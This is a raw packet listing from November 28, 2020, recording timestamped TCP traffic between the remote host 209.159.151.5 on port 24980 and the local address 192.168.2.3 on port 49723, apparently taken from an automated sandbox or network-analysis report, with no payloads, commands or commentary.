Nov 28, 2020 17:49:17.563344955 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.563474894 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.667670965 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.714481115 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.721899033 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.875973940 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892357111 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892399073 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892425060 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892448902 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892474890 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892473936 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.892501116 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892508030 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.892524004 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892549992 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892570972 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.892574072 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892599106 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.892611027 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.892659903 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996613026 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996649981 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996675014 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996706009 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996733904 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996757030 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996783018 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996788025 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996809959 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996814966 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996834993 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996848106 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996860981 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996865988 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996889114 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996913910 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996916056 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996942043 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996967077 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.996968985 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.996990919 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997015953 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997015953 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.997066021 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.997108936 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997133970 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997165918 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997184992 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.997190952 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.997246027 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101255894 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101305962 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101335049 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101358891 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101376057 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101414919 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101430893 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101443052 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101464987 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101485968 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101509094 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101511002 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101536989 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101547956 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101561069 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101583958 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101591110 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101610899 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101635933 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101649046 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101659060 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101684093 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101696014 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101702929 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101728916 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101733923 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101752996 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101775885 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101792097 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101802111 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101830959 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101836920 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101855993 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101882935 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101887941 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101910114 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101938963 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101943970 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.101964951 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101989985 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.101989985 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102015972 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102036953 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102042913 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102067947 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102092981 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102101088 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102116108 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102140903 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102143049 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102164030 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102186918 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102191925 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102209091 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102231979 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102236986 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102253914 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102276087 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.102283001 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.102328062 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206185102 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206239939 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206275940 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206314087 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206324100 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206366062 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206377983 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206403971 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206451893 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206453085 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206505060 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206554890 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206557989 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206603050 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206650972 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206651926 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206711054 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206762075 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206764936 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206821918 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206870079 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206876040 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206929922 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.206981897 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.206985950 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207037926 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207075119 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207091093 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207118988 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207170963 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207175970 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207228899 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207282066 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207289934 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207340956 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207393885 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207396984 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207437038 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207472086 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207487106 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207515001 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207554102 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207590103 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207591057 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207645893 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207649946 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207701921 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207742929 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207753897 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207778931 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207814932 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207827091 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207859039 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207899094 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207910061 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.207935095 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207971096 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.207982063 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.208008051 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208044052 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208076000 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.208080053 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208117008 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208129883 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.208159924 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208199978 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208208084 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.208235979 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208272934 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208285093 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.208311081 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.208363056 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312093973 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312179089 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312221050 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312259912 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312259912 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312298059 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312300920 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312339067 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312386990 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312390089 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312437057 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312477112 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312484980 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312516928 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312556982 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312581062 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312594891 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312633991 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312648058 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312674999 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312721968 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312752962 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312764883 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312803030 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312818050 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312844038 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312890053 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312895060 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.312944889 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.312998056 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313002110 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313057899 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313119888 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313122988 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313182116 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313227892 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313230991 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313287020 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313347101 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313349009 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313452005 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313509941 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313510895 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313558102 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313599110 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313626051 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313647032 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313690901 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313699961 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313730955 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313770056 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313776970 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313808918 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313847065 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313855886 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313886881 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313926935 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.313935041 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.313973904 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314017057 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314052105 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.314057112 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314095974 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314111948 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.314135075 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314172029 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314184904 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.314210892 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314249039 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314260006 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.314299107 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.314354897 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418195009 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418246031 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418286085 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418325901 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418339014 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418368101 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418375969 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418417931 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418462038 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418476105 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418502092 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418540955 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418551922 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418581009 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418618917 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418627024 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418658972 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418698072 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418715000 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418745995 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418788910 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418797016 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418826103 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418867111 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418878078 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418905020 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418941975 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.418977976 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.418982029 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419019938 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419023991 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419068098 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419111013 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419126034 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419148922 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419188023 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419198990 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419225931 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419262886 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419281960 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419300079 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419338942 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419349909 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419385910 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419429064 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419456005 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419467926 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419508934 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419529915 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419548988 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419586897 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419616938 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419625998 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419662952 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419671059 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419711113 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419753075 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419765949 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419791937 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419831991 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419852972 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419869900 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419907093 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419915915 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.419945955 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419984102 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.419998884 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.420030117 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.420073032 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.420080900 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.420111895 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.420154095 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.523955107 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.523983955 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524000883 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524019003 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524038076 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524059057 CET	24980	49723	209.159.151.5	192.168.2.3
